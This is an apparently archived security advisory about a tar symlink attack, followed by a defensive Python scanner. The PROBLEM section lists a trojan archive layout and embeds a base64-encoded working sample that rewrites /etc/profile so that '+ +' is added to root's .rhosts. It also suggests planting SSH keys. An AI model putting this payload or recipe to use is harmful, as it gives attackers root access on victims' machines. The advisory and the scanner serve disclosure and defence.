COMMAND

    tar

SYSTEMS AFFECTED

    All systems?

PROBLEM

    Willy TARREAU found the following after some problems found with
    locate, bash and others, and wondering how tar could be abused.
    Although this is not a buffer overflow in a file or directory name
    (fortunately), it is a nasty way to make tar overwrite files at
    absolute paths on disk (given that the extracting user has write
    access to them).  It is based on symlinks.

    Here is an example of a tar file which will overwrite your
    /etc/profile so that it adds "+ +" to root's .rhosts the next time
    he logs in.  So if part of its directory layout is included in any
    package, a root user could un-tar it to any location without really
    noticing that /etc/profile has been rewritten.  Of course it would
    be simpler with only two files, one link to /root and a .rhosts,
    but that becomes really evident when you list the archive before
    extracting it.  Note that it could also be interesting to write a
    key to $ANYUSER/.ssh/authorized_keys!  The output of tar ztvf is:

        $ tar ztvf trojanhorse.tar.gz
        drwxr-xr-x willy/users       0 Sep 21 11:43 1998 Src/
        -rw-r--r-- willy/users      46 Sep 21 11:43 1998 Src/Makefile
        -rw-r--r-- willy/users      17 Sep 21 11:42 1998 Src/dummy.c
        lrwxrwxrwx willy/users       0 Sep 21 11:45 1998 src -> Src
        drwxr-xr-x willy/users       0 Sep 21 11:41 1998 Include/
        -rw-r--r-- willy/users      30 Sep 21 11:41 1998 Include/config.h
        lrwxrwxrwx willy/users       0 Sep 21 11:34 1998 include -> /etc
        -rw-r--r-- willy/users     758 Sep 21 11:40 1998 include/profile
        lrwxrwxrwx willy/users       0 Sep 21 11:53 1998 include -> Include

    The "src" and "Src" directories are only there to make detection
    less evident.  It is the "include" link to /etc that does the
    work.  After processing, it is re-linked to "Include", so when tar
    ends no trace is kept of what has been done, except in
    /etc/profile.  The file follows, MIME-encoded.  PLEASE SAVE YOUR
    /etc/profile before extracting it to any place (/tmp, for
    example).

    ---
    Content-Type: application/octet-stream; name="trojan.taz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="trojan.taz"
    Content-MD5: Ce3OCTHse6Qlt7KZvnMw7w==

    H4sICOEiBjYCA3Ryb2phbmhvcnNlLnRhcgDtWF1P2zAUzWv9K+4yJDRQG9ttEo2paDzAqAQD
    LUz76iRC4jYeSVzZCdCX/fbZaUvHNO3joWVafV5ixzfO9T0+vjeJZOI5Kwb0cOj74AAA6fUe
    XOfAAEGASY+EQdDTo5j6gQO+swbUqoolgHPL83z6SzsmlfPfIdL8n8bXbMRztqp3EIyDH3h/
    yL8fLPn3Qz1KQsM/tvyvHE8hrYtiCsV8DyAU5/kear1kSSYMN+4HUUMuFIMnLnIs/kP9Nzug
    kziPpn9KlvqnvtF/gLHV/zrg7cwPACN+2PGsxDcLSiYrfwehOAzDP6n/KCbY6B+HOHSARmtw
    bsP1PyiTvE7ZSr8B/qb+93FT/xFs6/+18p+IcsTHnexR8n93Wf/7VO8FQn2/a/P/mvL/Fx0C
    qARM6griWR2QMWmLgY0An+n/H8n/JAh83NT/ga7/qceqxOp/Hfx7EylW9gvoN+c/6QbL879H
    u+b8D7rEnv/r+f9jRLagH6GnEE1VxQq45SkDVt5wKcqClTo1lCmYWFX1BLT5WMaF0uZHdZlU
    XJSqMYhzHiumYCyAl7Opr2KVyQSh84OL4767ZS57Xq2k956QN4F3xUsXnUek734a1i+HGQzf
    fR4Ot8BFqM55wStoJ/qDoAHiI/gElzyF9ri8hP6sWetmO563dXNc6e0Fn19AlbESteoiVteA
    MUUsV+y+TykacYTeRodv+otp0MnZq9cHp4f9LXMbnR4MTvqudxNLT02EyL0i5rnXjGnvjs+i
    i8b40qzBy4Sqyrhgl+h4EF1Eg4+HfeN10zsanBwu77C7iZAVmECAXjgsJoLFg/D9M2BeB3PH
    wLiE0EhI4PcBnnPXSb2djsrgBaQCtZpIte9giy8j0eroLmrpZaeiZLNgNqvRkZRCVPeWWpTN
    7z93F3Zd2N+Hr2bY60izSGWGkwm009HkgQOzjsjTxWbSdhmLdWjp8x/HYP/hvtOmsoD26Gdz
    zFw5EeIa4gqmopYw9wT22s9cMKxAW8H2B1Fv3zC4YqyELE6uWQpXU13SGIGbybabVRrabd7/
    N/M/JZia7z/aw7r+p4M1OLfh57+FhYWFhYWFhYWFxebgGzr447cAKAAA

    -----

SOLUTION

    This sort of thing is why 'der Mouse' added a key (he picked "j")
    to his tar to watch for exactly this kind of thing: add j to an x
    operation and tar will refuse to extract such archive members.
    The comment header on the relevant function reads

    /*
     * About to extract a file.  Check that the pathname is free from
     *  certain evil things that do not normally appear in tar archives,
     *  but could, and would be unpleasant.  We walk the path, following
     *  any symlinks that exist in the filesystem (thereby catching
     *  archives that, eg, contain a symlink ./foo->/etc and then a file
     *  ./foo/passwd).  If we follow a symlink to an absolute path, or if
     *  we ever try to ../ up out of our current directory, we print a
     *  complaint and skip the extraction of this archive member.  Also, we
     *  refuse attempts to hard-link to anything other than a plain file.
     *
     * This code is full of potential races, but we aren't trying to
     *  protect against races between tars extracting and other processes
     *  meddling, only against extracting archives that contain evil
     *  things.  The idea is that rather than doing a tar tvf of the
     *  archive and eyeball-scanning for evil things, extract with j and
     *  let tar do the checking.
     */
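    The check described in that comment, applied to the archive layout
    shown in the PROBLEM section, as an added example.  This is not der
    Mouse's tar code and not part of the original advisory; it is a
    standalone Python scanner that walks each member's directory
    components, following symlinks recorded earlier in the same archive,
    and rejects a member whose path crosses a symlink to an absolute
    target or climbs out of the extraction directory with "..".  It
    models only symlinks that the archive itself creates (symlinks
    already present on disk, which the tar patch also follows, are
    outside its scope), and the sample archive, file contents and names
    such as EvilPath and scan_archive are constructed for this example.

```python
import io
import tarfile


class EvilPath(Exception):
    """Raised when an archive member would land outside the extraction dir."""


def resolve_member_path(name, links, max_hops=40):
    """Resolve the directory components of `name` through `links`, a dict of
    archive path -> symlink target seen so far in the archive.  The final
    component is the entry being created, so it is never followed (a later
    symlink may legitimately replace an earlier one of the same name).
    Returns the normalized path relative to the extraction directory or
    raises EvilPath."""
    if name.startswith('/'):
        raise EvilPath(f"absolute member name: {name}")
    parts = [p for p in name.split('/') if p not in ('', '.')]
    if not parts:
        raise EvilPath(f"empty member name: {name!r}")
    final = parts.pop()
    if final == '..':
        raise EvilPath(f"member name ends in '..': {name}")
    current = []   # components of the directory we are currently in
    hops = 0
    while parts:
        comp = parts.pop(0)
        if comp == '..':
            if not current:
                raise EvilPath(f"'..' escapes the extraction directory in {name}")
            current.pop()
            continue
        candidate = '/'.join(current + [comp])
        target = links.get(candidate)
        if target is None:           # ordinary directory component
            current.append(comp)
            continue
        hops += 1
        if hops > max_hops:
            raise EvilPath(f"symlink loop while resolving {name}")
        if target.startswith('/'):   # the "include -> /etc" case
            raise EvilPath(f"{candidate} -> {target} leaves the extraction directory")
        # relative symlink: splice its components in front of what is left,
        # relative to the link's parent directory (which is `current`)
        parts = [p for p in target.split('/') if p not in ('', '.')] + parts
    return '/'.join(current + [final])


def scan_archive(data):
    """Scan an in-memory tar archive (bytes) in member order, the way an
    extraction would process it.  Returns (accepted_names, rejected) where
    rejected is a list of (member_name, reason)."""
    links = {}       # symlinks the archive has created so far
    regular = set()  # plain files created so far (hard-link targets)
    accepted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(data), mode='r:*') as tf:
        for m in tf:
            try:
                resolved = resolve_member_path(m.name, links)
                if m.issym():
                    links[resolved] = m.linkname       # create or replace
                else:
                    links.pop(resolved, None)          # a real entry shadows a link
                    if m.islnk() and m.linkname not in regular:
                        raise EvilPath(f"hard link to non-plain-file {m.linkname}")
                    if m.isreg():
                        regular.add(resolved)
                accepted.append(m.name)
            except EvilPath as exc:
                rejected.append((m.name, str(exc)))
    return accepted, rejected


def build_sample_archive():
    """Construct, in memory, an archive with the member order shown in the
    advisory's listing; the file contents are placeholders."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w:gz') as tf:
        def add_dir(name):
            ti = tarfile.TarInfo(name); ti.type = tarfile.DIRTYPE; ti.mode = 0o755
            tf.addfile(ti)

        def add_file(name, content):
            ti = tarfile.TarInfo(name); ti.size = len(content); ti.mode = 0o644
            tf.addfile(ti, io.BytesIO(content))

        def add_symlink(name, target):
            ti = tarfile.TarInfo(name); ti.type = tarfile.SYMTYPE; ti.linkname = target
            tf.addfile(ti)

        add_dir('Src')
        add_file('Src/Makefile', b'all:\n')
        add_symlink('src', 'Src')
        add_dir('Include')
        add_file('Include/config.h', b'#define CONFIG 1\n')
        add_symlink('include', '/etc')
        add_file('include/profile', b'# constructed placeholder\n')
        add_symlink('include', 'Include')
    return buf.getvalue()


if __name__ == '__main__':
    ok, bad = scan_archive(build_sample_archive())
    for name, reason in bad:
        print(f"REFUSED {name}: {reason}")
```

    Run against the constructed archive, the scanner accepts the seven
    harmless members (including the relative "src -> Src" link and the
    final re-link of "include") and refuses only "include/profile",
    because its parent component resolves through "include -> /etc".
    Like the tar patch, it reasons only about the archive's contents and
    does nothing about races with other processes, so it is a
    pre-extraction filter, not a substitute for extracting as an
    unprivileged user into an empty directory.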